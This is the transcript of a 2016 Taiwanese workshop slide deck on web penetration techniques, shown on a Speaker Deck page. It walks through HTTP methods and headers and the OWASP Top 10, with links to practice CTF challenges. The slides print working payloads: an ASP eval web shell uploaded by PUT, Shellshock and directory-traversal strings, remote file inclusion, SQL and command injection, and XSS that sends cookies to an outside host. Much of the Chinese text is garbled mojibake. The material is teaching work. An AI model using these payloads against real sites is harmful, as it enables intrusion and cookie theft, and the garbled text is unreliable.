Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Web滲透技巧(上)

Lionbug
October 01, 2016
Research
1
360

 Web滲透技巧(上)

The Declaration of Hacker (TDOH) WorkShop

Lionbug

October 01, 2016
Tweet

More Decks by Lionbug

See All by Lionbug
Privacy and Security
lionbug
0
210
Web滲透技巧(下)
lionbug
0
660

Other Decks in Research

See All in Research
論文紹介 DISN: Deep Implicit Surface Network for High quality Single-view 3D Reconstruction / DISN: Deep Implicit Surface Network for High quality Single-view 3D Reconstruction
nttcom
0
130
[2023 CCSE] ZOZOTOWN検索における 研究開発の取り組みについて
tomoyayama
0
130
方策の長期性能に対する 効率的なオフライン評価・学習 (Long-term Off-Policy Evaluation and Learning)
usaito
PRO
2
210
HP (Hitto Point: 筆頭ポイント)
tanichu
0
760
20240127_熊本から今いちど真面目に都市交通~めざせ「車1割削減、渋滞半減、公共交通2倍」~ 全国路面電車サミット2024宇都宮
trafficbrain
1
680
20240209 データを肴に熊本の交通を考える会「車1割削減、渋滞半減、公共交通2倍」をめざし世界に学ぼう
trafficbrain
0
890
How to Perform Manual Classification for Deep Learning Using CloudCompare
kentaitakura
0
680
Prompt Tuning から Fine Tuning への移行時期推定
icoxfog417
17
7.1k
Weekly AI Agents News!
masatoto
13
3.9k
Webスケールデータセットに対する実用的なポイズニング手法 / Poisoning Web-Scale Training Datasets is Practical
nttcom
0
130
第14回対話システムシンポジウム EMNLP 2023 参加報告
atsumoto
0
160
Threat Intelligence and Beyond
rishikadesai_7
0
170

Featured

See All Featured
Pencils Down: Stop Designing & Start Developing
hursman
117
11k
Building Better People: How to give real-time feedback that sticks.
wjessup
356
18k
How to Ace a Technical Interview
jacobian
273
22k
VelocityConf: Rendering Performance Case Studies
addyosmani
321
23k
4 Signs Your Business is Dying
shpigford
176
21k
Web development in the modern age
philhawksworth
203
10k
I Don’t Have Time: Getting Over the Fear to Launch Your Podcast
jcasabona
22
1.6k
Writing Fast Ruby
sferik
622
60k
How to name files
jennybc
65
93k
Intergalactic Javascript Robots from Outer Space
tanoku
266
26k
Design and Strategy: How to Deal with People Who Don’t "Get" Design
morganepeng
117
18k
Building Adaptive Systems
keathley
32
1.9k

Transcript

  1. Web佒蝚ದૣ(Ӥ) 2016/10/01 @ TDOH WorkShop LionBug

  2. About Me • 讙紣Ռ̴a.k.a̴LionBug • ಑褾ੜ୞ of TDOH • Co-founder

    of UCCU • Know a little • Web Security

  3. HTTP Hypertext Transfer Protocol

  4. HTTPS Hypertext Transfer Protocol Secure

  5. 螀֢ܻቘ

  6. Request & Response

  7. HTTP Request GET /index.php HTTP/1.1 Host: lionbug.tw User-Agent: Mozilla/5.0 (Windows

    NT 10.0; WOW64; Trident/7.0; rv:11.0) Accept: text/html,application/xhtml+xml,application/xml;q=0.9 Accept-Language: zh-TW,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Connection: keep-alive

  8. Netcat or Telnet

  9. Burp Suite

  10. HTTP Request

  11. HTTP GET Request GET /index.php HTTP/1.1 Host: lionbug.tw User-Agent: Mozilla/5.0

    (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) Accept: text/html,application/xhtml+xml,application/xml;q=0.9 Accept-Language: zh-TW,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Connection: keep-alive

  12. HTTP POST Request POST /login.php HTTP/1.1 … Content-Type: application/x-www-form-urlencoded Content-Length:

    29 <Enter> username=admin&password=admin

  13. HTTP Method • GET • POST • HEAD • OPTIONS

    PUT DELETE TRACE MOVE…

  14. HTTP OPTIONS Request OPTIONS / HTTP/1.1 HOST: lionbug.tw

  15. HTTP OPTIONS Request SUCCESS HTTP/1.1 200 OK Allow: OPTIONS, TRACE,

    GET, HEAD, POST Server: Microsoft-IIS/7.5 Public: OPTIONS, TRACE, GET, HEAD, POST X-Powered-By: ASP.NET

  16. HTTP OPTIONS Request Failed HTTP/1.1 200 OK Date: Thu, 29

    Sep 2016 07:43:10 GMT Server: Apache

  17. HTTP PUT Request PUT /shell.asp HTTP/1.1 HOST: lionbug.tw Content-Length: 26

    <%eval(request(“cmd”))%>

  18. HTTP PUT Request SUCCESS HTTP/1.1 201 Created Server: Microsoft-IIS/6.0 X-Powered-By:

    ASP.NET Location: http://lionbug.tw/shell.asp

  19. HTTP PUT Request Failed HTTP/1.1 404 Not Found

  20. HTTP MOVE Request MOVE /shell.txt HTTP/1.1 HOST: lionbug.tw Destination: http://lionbug.tw/shell.asp

  21. HTTP MOVE Request SUCCESS HTTP/1.1 201 Created Server: Microsoft-IIS/6.0 X-Powered-By:

    ASP.NET Location: http://lionbug.tw/shell.asp

  22. HTTP MOVE Request Failed HTTP/1.1 401 Unauthorized

  23. WebDAV • MOVE shell.asp;.jpg • COPY shell.asp%00.jpg • NTFS稗褖 •

    Ӿࢵኪמ礓羬ᕹWebDav笙၏੕膌 getshell

  24. HTTP TRACE Request TRACE /hello HTTP/1.1 HOST: lionbug.tw Lion: bug

  25. HTTP TRACE Request SUCCESS HTTP/1.1 200 OK … TRACE /hello

    HTTP/1.1 HOST: lionbug.tw Lion: bug

  26. XST Cross-Site Tracing

  27. HTTP TRACE Request TRACE /<script>alert(1);<script> HTTP/1.1 HOST: lionbug.tw

  28. HTTP TRACE Request SUCCESS HTTP/1.1 200 OK … TRACE /<script>alert(1);<script>

    HTTP/1.1 HOST: lionbug.tw

  29. HTTP TRACE Request • XST • Bypass httpOnly?

  30. Try Bypass http://ctf.mis.nkfust.edu.tw/bypass01/

  31. HTTP Request URI GET /index.php HTTP/1.1 Host: lionbug.tw User-Agent: Mozilla/5.0

    (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) Accept: text/html,application/xhtml+xml,application/xml;q=0.9 Accept-Language: zh-TW,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Connection: keep-alive

  32. HTTP Request URI • /index.php • /upload/ • /blog/1 •

    /index.php/blog/1 • ../../../../../etc/passwd

  33. Django Directory Traversal

  34. Try Bypass http://ctf.mis.nkfust.edu.tw/bypass02/

  35. HTTP Request Version GET /index.php HTTP/1.1 Host: lionbug.tw User-Agent: Mozilla/5.0

    (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) Accept: text/html,application/xhtml+xml,application/xml;q=0.9 Accept-Language: zh-TW,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Connection: keep-alive

  36. HTTP Request Version • ଉ憎粚๜ • 1.0 • 1.1 •

    Host • Connection: Keep-Alive • 2.0 • HTTP2.0ܐᦓᤩ฿4ӻṛܧ笙၏牧 ݢ膌๐ۓ瑊ૄმ(Freebuf)

  37. HTTP Request Header GET /index.php HTTP/1.1 Host: lionbug.tw User-Agent: Mozilla/5.0

    (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) Accept: text/html,application/xhtml+xml,application/xml;q=0.9 Accept-Language: zh-TW,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Connection: keep-alive

  38. Requests HOST • Host: lionbug.tw • HTTP 1.1 • VirtualHost

    • …

  39. Try Bypass http://ctf.mis.nkfust.edu.tw/bypass03/

  40. Requests User-Agent • User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0;

    rv:11.0) • 战ग़翕ᒊ螡䢔珊匍獉਻ • Shellshock (bash CVE-2014-6271) • () { :; }; ping -c 5 lionbug.tw • …

  41. Requests Referer • Referer: http://lionbug.tw/index.php • …

  42. Requests Accept 疑碢 • Accept: text/html; • Accept-Language: zh-TW,zh; •

    Accept-Encoding: gzip, deflate • Accept-Ranges: bytes=0-1 • …

  43. Requests Accept-Language • Accept-Language: zh-TW,zh; • …

  44. Requests Accept-Ranges • Accept-Ranges: bytes=0-500 • Accept-Ranges: bytes=0-500,50-100 • CVE-2011-3192,

    CVE-2015-1635(MS15-034) • …

  45. Requests Cookie • Cookie: PHPSESSID=sess_3dd484f2bab6a2d 2509e9850dae3b897; • …

  46. Requests X-Forwarded-For • X-Forwarded-For: 127.0.0.1 • …

  47. HTTP Response

  48. HTTP Status Code HTTP/1.1 200 OK Date: Wed, 25 May

    2016 11:48:22 GMT Server: Apache Content-Length: 72 Connection: close Content-Type: text/html

  49. HTTP Status Code • 1xx ૪ᤩ矑ݑ牧襑ᥝ媣媲蒂ቘ • 2xx ૪౮ۑᤩ֑๐瑊矑硩牏ቘ薹牏㪔矑ݑ •

    3xx 制眲嘨አ㬵᯿碝疩ݻ牧盅媲ጱ藶穩֖࣎ • 4xx դ蔭ԧአ䜛ᒒ፡蚏㬵ݢ胼咳ኞԧ梊藮牧ঘ繸 ԧ֑๐瑊ጱ蒂ቘ • 5xx ֑๐瑊ࣁ蒂ቘ藶穩ጱ螂纷Ӿ磪梊藮౲ᘏ吖ଉ 制眲咳ኞ

  50. HTTP Status Code • 200 OK • 3xx • 301

    Moved Permanently • 302 Found • 4xx • 401 Unauthorized • 403 Forbidden • 500 Internal Server Error

  51. HTTP Response Header HTTP/1.1 200 OK Date: Wed, 25 May

    2016 11:48:22 GMT Server: Apache Content-Length: 72 Connection: close Content-Type: text/html

  52. Response Server • Server: Apache/2.4.7 (Ubuntu) • Server: Microsoft-IIS/7.5 •

  53. Response X-Powered-By • X-Powered-By: Flask/0.7.2 • X-Powered-By: ASP.NET • X-Powered-By:

    PHP/5.5.9-1ubuntu4.19 • …

  54. HTTP Response Content HTTP/1.1 200 OK … <html> </html>

  55. Try to find http://ctf.mis.nkfust.edu.tw/bypass05/

  56. OWASP TOP 10 2013 ᤩ拻粋ጱ聲໺

  57. ๚涢挨ጱ疩ݻ • A10 - Unvalidated Redirects and Forwards • https://google.com/?redirect=http://lionbug.tw/

    • https://google.com/?redirect=http%3A%2f %2flionbug.tw%2f

  58. Unvalidated Redirects and Forwards https://bounty.github.com/classifications/ unvalidated-redirect-or-forward.html

  59. ֵአ૪Ꭳ笙၏زկ • A9 - Using Components with Known Vulnerabilities •

    ଉ憎笙၏ॺկ • FCKeditor, CKeditor • WordPress or Plugin • WPScan

  60. ᪜ᒊٛݷ藶穩 • A8 – Cross Site Request Forgery (CSRF) •

    藶穩ےӤtoken • 蝐抓牫᯿ᗝੂ嘨牫 • <img src=“http://lionbug.tw/newpass?pass=123”>

  61. 耬੝ۑ胼羷獨ጱਂ玲矒ګ • A7 – Missing Function Level Access Control •

    /admin/upload.php • .git .svn • index.php~ • robots.txt

  62. robots.txt # robots.txt to deny the robots access User-agent: *

    Disallow: /admin Disallow: /admin.ex Disallow: /config

  63. robots.txt • fb.me/robots.txt • www.dcard.tw/robots.txt • tw.yahoo.com/robots.txt

  64. 硵眤虻碘ู襷 • A6 – Sensitive Data Exposure • ੂ嘨 •

    MD5牏SHA1牏DES • ก嘨㯽蜍

  65. ੂ嘨ਂࣁCookieӾ

  66. LinkedIn 癱ੂ丽笙 http://thehackernews.com/2016/05/linkedin-account- hack.html

  67. dadada http://www.nydailynews.com/news/national/mark-zuckerberg- twitter-account-hacked-password-dadada-article-1.2662351

  68. ౯ጱੂ嘨䷱磪ےੂ 褾仡

  69. EC-Council

  70. EC-Council ?????????

  71. 犋吚ጱਞ獊奲眲戔ਧ • A5 – Security Misconfiguration • ୧ੂ嘨? admin? root?

    1234? • port • 3306 mysql • 6379 redis • 8081 tomcat • …

  72. 犋ਞ獊ጱᇔկ㷢ᘍ • A4 – Insecure Direct Object References • ଘᤈ稗褖

    • /?stuid=u9823001 • /cgpwd.php?username=admin&pass=1234 • /delete.php?id=123

  73. ଘᤈ稗褖笙၏ A ݶ䋊 B ݶ䋊 C ݶ䋊 D ݶ䋊 Admin

  74. Facebook Fixes Vulnerability That Led to Account Takeover, Pays Researcher

    $16K https://threatpost.com/facebook-fixes-vulnerability-that- led-to-account-takeover-pays-researcher-16k/120688/

  75. Security Researcher Discovers Bug That Would Let Hackers Delete Any

    Photo Off Facebook https://techcrunch.com/2013/09/02/security-researcher-discovers- bug-that-would-let-hackers-delete-any-photo-off-facebook/

  76. OpenFind Mail2000 犨఺᯿ᗝੂ嘨

  77. 狕硬㮆Ո虻碘 襑ᥝ戔ਧᒫԫמᓟ಍胼硩᯿ᗝמ

  78. modify_id ??

  79. ౮ۑ᯿ᗝadminੂ嘨 https://zeroday.hitcon.org/vulnerability/ ZD-2016-00031

  80. 犋吚ጱਞ獊奲眲戔ਧ • Directory Traversal • /download.php?file=123.pdf • /download.php?file=../../../../../etc/passwd • Local

    File Inclusion • /index.php?mod=news • <?php include($_GET[‘mod’].’php’); ?>

  81. 犋吚ጱਞ獊奲眲戔ਧ • Remote File Inclusion • /index.php?mod=http://lionbug.tw/shell.php
 allow_url_fopen=On

  82. WhatsApp LFI http://thehackernews.com/2013/06/Hacking- whatsapp-android-application.html

  83. ᪜ᒊ脻๜纷ୗ硭䢗 • A3 – Cross-Site Scripting(XSS) • 硭䢗ਮ䜛ᒒ牫 • ࣁ獮ᒒ矠獈䘣఺դ嘨

    •HTML牏CSS牏Javascript牏Flash …

  84. ᪜ᒊ脻๜纷ୗ硭䢗 • 玱疤ࣳ • http://lionbug.tw/xss.php? msg=<script>alert(1);</script> • 㱪ਂࣳ • ෈ᒍ獉෈

    • …

  85. ՗碝窚盏玡Ӟ賳Flash XSSکXSS Worm https://www.leavesongs.com/HTML/sina-weibo- flashxss-worm.html

  86. XSS 猂玲 Cookie

  87. ᪜ᒊ脻๜纷ୗ硭䢗 <script> var img = new Image(); img.src = ‘http://lionbug.tw/’+document.cookie;

    </script>

  88. OpenFind Mail2000 Xss

  89. • onclick 磦矦౮ xonclick • script 磦矦౮ scrips • html

    ݄ᴻ ?? OpenFind Mail2000

  90. <html></html><<html></html>s<html></ html>c<html></html>r<html></html>i<html></ html>p<html></html>t<html></ html>><html></html>a<html></html>l<html></ html>e<html></html>r<html></html>t<html></ html>(<html></html>'<html></html>x<html></ html>s<html></html>s<html></html>'<html></ html>)<html></html>;<html></html><<html></ html>/<html></html>s<html></html>c<html></ html>r<html></html>i<html></html>p<html></

    html>t<html></html>> XSS Payload

  91. OpenFind Mail2000 XSS

  92. BeEF 吚㮆ૡٍՈ

  93. XSS 犖胼಑盅ݣ

  94. Try to find http://ctf.mis.nkfust.edu.tw/bypass06

  95. ०硳ጱ涢挨膏蝫娄ᓕቘ • A2 – Broken Authentication and Session Management •

    Session and Cookie • Cookie • admin=0; • user=21232f297a57a5a743894a0e4a801fc3; • HMAC ?? • …

  96. 襷ॠ笙၏ http://www.inside.com.tw/2015/08/21/ruten-security- issue

  97. ဳ獈硭䢗 • A1 – Injection • ဳ獈圵觊 • SQL Injection

    • Code Injection • Command Injection • LDAP Injection • …

  98. SQL Injection Select username, password From Member Where username =

    ‘admin’ and password = ‘1234’

  99. user.php?id=1 SELECT id, name, password From member Where id =

    1 id name password 1 admin asdxcx 2 lin 5657 3 jhe 123 4 lionbug qwe

  100. user.php?id=1 or 1=1 SELECT id, name, password From member Where

    id = 1 Or 1=1 id name password 1 admin asdxcx 2 lin 5657 3 jhe 123 4 lionbug qwe id name password 1 admin asdxcx 2 lin 5657 3 jhe 123 4 lionbug qwe

  101. Login SELECT … Where name = ‘admin’ AND password =

    ‘asdxcx’ id name password 1 admin asdxcx 2 lin 5657 3 jhe 123 4 lionbug qwe id name password 1 admin asdxcx 2 lin 5657 3 jhe 123 4 lionbug qwe id name password 1 admin asdxcx 2 lin 5657 3 jhe 123 4 lionbug qwe

  102. Login SELECT … Where name = ‘admin’ or 1 =

    1 -- ‘’ AND password = ‘’ id name password 1 admin asdxcx 2 lin 5657 3 jhe 123 4 lionbug qwe id name password 1 admin asdxcx 2 lin 5657 3 jhe 123 4 lionbug qwe id name password 1 admin asdxcx 2 lin 5657 3 jhe 123 4 lionbug qwe id name password 1 admin asdxcx 2 lin 5657 3 jhe 123 4 lionbug qwe

  103. Code Injection • 纷ୗ嘨ဳ獈 • PHP • eval($_GET[‘code’]); • ASP

    • <%eval request("code")%>

  104. Uber Remote Code Execution http://blog.orange.tw/2016/04/bug-bounty-uber- ubercom-remote-code_7.html

  105. Command Injection • ޸犤ဳ獈 • curl http://lionbug.tw • curl http://lionbug.tw;

    ls -al

  106. Google Command injection http://www.pranav-venkat.com/2016/03/command- injection-which-got-me-6000.html

  107. 伛猋ૡ֢ • 蘷獨承᥺ ໛礍 羬翄 (wappalyzer) • 矊ፓ袅 (dirb) •

    㯏礚 • subDomainsBrute • … • …

  108. ଉ憎笙၏ڥአ • 犨఺Ӥ㯽笙၏ • LFI • SQL injection • …

  109. 犨఺Ӥ㯽笙၏ • 涢挨ොୗ • JS • FileName • Content-Type •

    Header

  110. JS 獮ᒒ涢挨

  111. 犨఺Ӥ㯽笙၏ • FileName • 123.jpg • 123.php%00.jpg • 123.jpg.php •

    123.php?.jpg

  112. 犨఺Ӥ㯽笙၏ • Content-Type • image/jpeg • image/png • Header •

    ??

  113. PHP Bug?? http://ctf.mis.nkfust.edu.tw/bypass07

  114. == TRUE FALSE 1 0 -1 "1" "0" "-1" NULL

    array() "php" "" TRUE TRUE FALSE TRUE FALSE TRUE TRUE FALSE TRUE FALSE FALSE TRUE FALSE FALSE FALSE TRUE FALSE TRUE FALSE FALSE TRUE FALSE TRUE TRUE FALSE TRUE 1 TRUE FALSE TRUE FALSE FALSE TRUE FALSE FALSE FALSE FALSE FALSE FALSE 0 FALSE TRUE FALSE TRUE FALSE FALSE TRUE FALSE TRUE FALSE TRUE TRUE -1 TRUE FALSE FALSE FALSE TRUE FALSE FALSE TRUE FALSE FALSE FALSE FALSE "1" TRUE FALSE TRUE FALSE FALSE TRUE FALSE FALSE FALSE FALSE FALSE FALSE "0" FALSE TRUE FALSE TRUE FALSE FALSE TRUE FALSE FALSE FALSE FALSE FALSE "-1" TRUE FALSE FALSE FALSE TRUE FALSE FALSE TRUE FALSE FALSE FALSE FALSE NULL FALSE TRUE FALSE TRUE FALSE FALSE FALSE FALSE TRUE TRUE FALSE TRUE array() FALSE TRUE FALSE FALSE FALSE FALSE FALSE FALSE TRUE TRUE FALSE FALSE "php" TRUE FALSE FALSE TRUE FALSE FALSE FALSE FALSE FALSE FALSE TRUE FALSE "" FALSE TRUE FALSE TRUE FALSE FALSE FALSE FALSE TRUE FALSE FALSE TRUE

  115. Q & A